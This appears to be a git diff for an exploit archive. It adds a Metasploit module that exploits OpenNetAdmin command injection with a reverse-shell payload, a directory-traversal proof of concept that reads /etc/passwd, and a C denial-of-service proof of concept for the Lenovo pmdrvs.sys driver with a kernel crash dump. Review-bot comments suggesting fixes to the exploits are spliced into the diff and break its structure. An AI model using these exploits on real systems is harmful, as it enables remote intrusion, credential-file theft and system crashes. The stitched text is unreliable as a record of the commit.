diff --git a/exploits/php/webapps/47772.rb b/exploits/php/webapps/47772.rb
new file mode 100755
index 000000000..a32129343
--- /dev/null
+++ b/exploits/php/webapps/47772.rb
@@ -0,0 +1,104 @@
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'OpenNetAdmin Ping Command Injection',
+ 'Description' => %q{
+ This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
+ },
+ 'Author' =>
+ [
+ 'mattpascoe', # Vulnerability discovery
+ 'Onur ER ' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['EDB', '47691']
+ ],
+ 'DisclosureDate' => '2019-11-19',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Privileged' => false,
+ 'Targets' =>
+ [
+ ['Automatic Target', {}]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 80,
+ 'payload' => 'linux/x86/meterpreter/reverse_tcp'
+ },
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('VHOST', [false, 'HTTP server virtual host']),
+ OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
+ ]
+ )
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'encode_params' => false,
+ 'vars_post' => {
+ 'xajax' => 'window_open',
+ 'xajaxargs[]' => 'app_about'
+ }
+ })
+
+ unless res
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ end
+
+ unless res.body =~ /OpenNetAdmin/i
+ return CheckCode::Safe
+ end
+
+ opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
+ version = Gem::Version.new('opennetadmin_version')
+
+ if version
+ vprint_status "OpenNetAdmin version #{version}"
+ end
+
+ if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
+ return CheckCode::Appears
+ end
+
+ CheckCode::Detected
+ end
+
+ def exploit
+ print_status('Exploiting...')
+ execute_cmdstager(flavor: :printf)
+ end
+
+ def filter_bad_chars(cmd)
+ cmd.gsub!(/chmod \+x/, 'chmod 777')
+ end
+
+ def execute_command(cmd, opts = {})
+ post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"
+
+ begin
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'encode_params' => false,
+ 'data' => post_data
+ })
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47773.txt b/exploits/php/webapps/47773.txt
new file mode 100644
index 000000000..742fb93d7
--- /dev/null
+++ b/exploits/php/webapps/47773.txt
@@ -0,0 +1,21 @@
+# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
+# Date: 2019-12-11
+# Author: Numan Türle
+# Vendor Homepage: http://www.bullwark.net/
+# Version : Bullwark Momentum Series Web Server JAWS/1.0
+# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
+
+POC
+---------
+
+GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 12.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+Response
+---------
+
+root:ABgia2Z.lfFhA:0:0::/root:/bin/sh
\ No newline at end of file
diff --git a/exploits/windows/dos/47771.c b/exploits/windows/dos/47771.c
new file mode 100644
index 000000000..bd8a55ca7
--- /dev/null
+++ b/exploits/windows/dos/47771.c
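Review bot: `check` builds the version from a string literal, `version = Gem::Version.new('opennetadmin_version')`, rather than from the scanned `opennetadmin_version` variable, so `Gem::Version.new` raises ArgumentError (malformed version string) before the range comparison is ever reached, and the following `if version` guard is effectively dead because the constructor never returns nil. The `scan(...).flatten.first` result can itself be nil when the about page carries no version string, and that case should fall back to `CheckCode::Detected` instead of reaching `Gem::Version.new`. Suggested replacement for the two lines: `return CheckCode::Detected unless opennetadmin_version` followed by `version = Gem::Version.new(opennetadmin_version)`. Minor style point: `res.body =~ /OpenNetAdmin/i` inside `unless` only needs a boolean, so `match?` avoids allocating MatchData.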
@@ -0,0 +1,435 @@
+# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
+# Date: 2019-12-11
+# Exploit Author: Nassim Asrir
+# CVE: CVE-2019-6192
+# Tested On: Windows 10(64bit) | ThinkPad T470p
+# Vendor : https://www.lenovo.com/us/en/
+# Ref : https://support.lenovo.com/us/fr/solutions/len-29334
+
+# Description
+# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver
+# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes
+# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
+
+# Exploit
+
+#include
+#include
+#include
+
+int main(int argc, char **argv)
+{
+ HANDLE hDevice;
+ DWORD bret;
+ char szDevice[] = "\\\\.\\pmdrvs";
+
+ printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
+
+ printf("Opening handle to driver..\n");
+
+ if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {
+ printf("Device %s succesfully opened!\n", szDevice);
+ printf("\tHandle: %p\n", hDevice);
+ }
+ else
+ {
+ printf("Error: Error opening device %s\n", szDevice);
+ }
+
+ printf("\nPress any key to DoS..");
+ _getch();
+
+ bret = 0;
+
+ if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
+ {
+ printf("DeviceIoControl Error - bytes returned %#x\n", bret);
+ }
+
+ CloseHandle(hDevice);
+ return 0;
+}
+
+
+# RCA
+
+2: kd> !analyze -v
+*******************************************************************************
+* *
+* Bugcheck Analysis *
+* *
+*******************************************************************************
+
+SYSTEM_SERVICE_EXCEPTION (3b)
+An exception happened while executing a system service routine.
+Arguments: +Arg1: 00000000c0000005, Exception code that caused the bugcheck +Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck +Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck +Arg4: 0000000000000000, zero. + +FAULTING_IP: +pmdrvs+109d +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] + +CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50) +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei pl zr na po nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246 +pmdrvs+0x109d: +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? +Resetting default scope + +CPU_COUNT: 8 + +CPU_MHZ: af8 + +CPU_VENDOR: GenuineIntel + +CPU_FAMILY: 6 + +CPU_MODEL: 9e + +CPU_STEPPING: 9 + +CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init) + +BLACKBOXBSD: 1 (!blackboxbsd) + + +BLACKBOXPNP: 1 (!blackboxpnp) + + +CURRENT_IRQL: 0 + +ANALYSIS_SESSION_HOST: LAPTOP-SP + +ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485 + +ANALYSIS_VERSION: 10.0.17763.132 amd64fre + +LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d + +STACK_TEXT: +ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d +ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060 +ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59 +ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : 
nt!NtQueryInformationFile+0x1071 +ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc +ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56 +ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925 +00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844 + + +THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68 + +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb + +THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b + +FOLLOWUP_IP: +pmdrvs+109d +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] + +FAULT_INSTR_CODE: 8941078b + +SYMBOL_STACK_INDEX: 0 + +FOLLOWUP_NAME: MachineOwner + +STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb + +BUGCHECK_STR: 2E8B5A19 + +EXCEPTION_CODE_STR: 2E8B5A19 + +EXCEPTION_STR: WRONG_SYMBOLS + +PROCESS_NAME: ntoskrnl.wrong.symbols.exe + +IMAGE_NAME: ntoskrnl.wrong.symbols.exe + +MODULE_NAME: nt_wrong_symbols + +SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000 + +BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 + +DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 + +PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS + +FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000 + +TARGET_TIME: 2019-09-30T19:27:36.000Z + +OSBUILD: 17763 + +OSSERVICEPACK: 0 + +SERVICEPACK_NUMBER: 0 + +OS_REVISION: 0 + +SUITE_MASK: 272 + +PRODUCT_TYPE: 1 + +OSPLATFORM_TYPE: x64 + +OSNAME: Windows 10 + +OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS + +OS_LOCALE: + +USER_LCID: 0 + +OSBUILD_TIMESTAMP: 1994-09-30 01:21:45 + 
+BUILDDATESTAMP_STR: 180914-1434 + +BUILDLAB_STR: rs5_release + +BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434 + +ANALYSIS_SESSION_ELAPSED_TIME: ae + +ANALYSIS_SOURCE: KM + +FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000 + +FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1} + +Followup: MachineOwner +--------- + +2: kd> u fffff804`28bf109d +pmdrvs+0x109d: +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] +fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax +fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000) +fffff804`28bf10a8 85c0 test eax,eax +fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132) +fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h] +fffff804`28bf10b8 4885c9 test rcx,rcx +fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132) +2: kd> !for_each_frame .frame /r @$Frame +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx +00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!KeBugCheckEx: +fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 +01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f27a8e9 
rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x7f09: +fffff804`1f27a8e9 90 nop +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c +02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x735c: +fffff804`1f279d3c b801000000 mov eax,1 +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f +03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!_chkstk+0x41f: +fffff804`1f271b4f 0f1f00 nop dword ptr [rax] +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 +04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 +rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 +rip=fffff8041f1ca460 
rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 +r14=0000000000000000 r15=ffffc709dee8f408 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!RtlUnwindEx+0x3440: +fffff804`1f1ca460 8bd0 mov edx,eax +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 +05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 +rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000 +rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40 +r14=ffffc709dee8f4b0 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!ExReleaseAutoExpandPushLockExclusive+0x264: +fffff804`1f0d7c24 84c0 test al,al +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 +06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 +rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x7fe2: +fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h] +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce +07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce +rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 
rcx=000000000000003b +rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530 + r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 +r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x42ce: +fffff804`1f276cae 440f20c0 mov rax,cr8 +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d +08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 +rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +pmdrvs+0x109d: +fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? 
+_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 +09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000 +rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +pmdrvs+0x5060: +fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a) +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 +0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 +rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!IofCallDriver+0x59: +fffff804`1f12dba9 4883c438 add rsp,38h +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 +0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 +rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 +rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 +r14=0000000000000002 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 
+nt!NtQueryInformationFile+0x1071: +fffff804`1f6abb11 448bf0 mov r14d,eax +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc +0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc +rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0 +rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!NtClose+0xffc: +fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663) +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 +0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 +rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 +rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!NtDeviceIoControlFile+0x56: +fffff804`1f64c356 4883c468 add rsp,68h +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 +0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 +rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 +rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80 + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz 
na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +nt!setjmpex+0x7925: +fffff804`1f27a305 0f1f00 nop dword ptr [rax] +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 +0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 +rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8 +rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c +rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c + r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 +r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 +r14=0000000000000000 r15=0000000000000000 +iopl=0 nv up ei ng nz na pe nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 +00007fff`33aaf844 ?? ??? +_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ +00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx + +# Mitigation + +Update to Lenovo Power Management driver version 1.67.17.48 or higher \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9ea8eaf0e..293b12fea 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
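Review bot: In `main` the `else` branch after `CreateFileA` prints the open failure but does not return, so execution continues into `_getch()` and `DeviceIoControl` with `hDevice == INVALID_HANDLE_VALUE`; adding `return 1;` after that `printf` keeps the PoC from reporting a misleading DeviceIoControl error on a machine where the device does not exist. The three `#include` lines carry no header names in this listing and the leading `# Exploit Title:` lines are not valid preprocessor directives, so the file as committed presumably does not compile without editing; the missing header names look like angle brackets stripped during extraction, which is worth confirming against the original submission. The header names 1.67.17.48 as the affected driver version while the closing Mitigation line says to update to 1.67.17.48 or higher, so one of the two is inconsistent and should be checked against the referenced Lenovo advisory before anyone uses it to decide whether a host is patched. Minor: `succesfully` in the success message is misspelled.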
@@ -6621,6 +6621,7 @@ id,file,description,date,author,type,platform,port
 47767,exploits/windows/dos/47767.py,"Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)",2019-12-11,SajjadBnd,dos,windows,
 47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows,
 47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows,
+47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
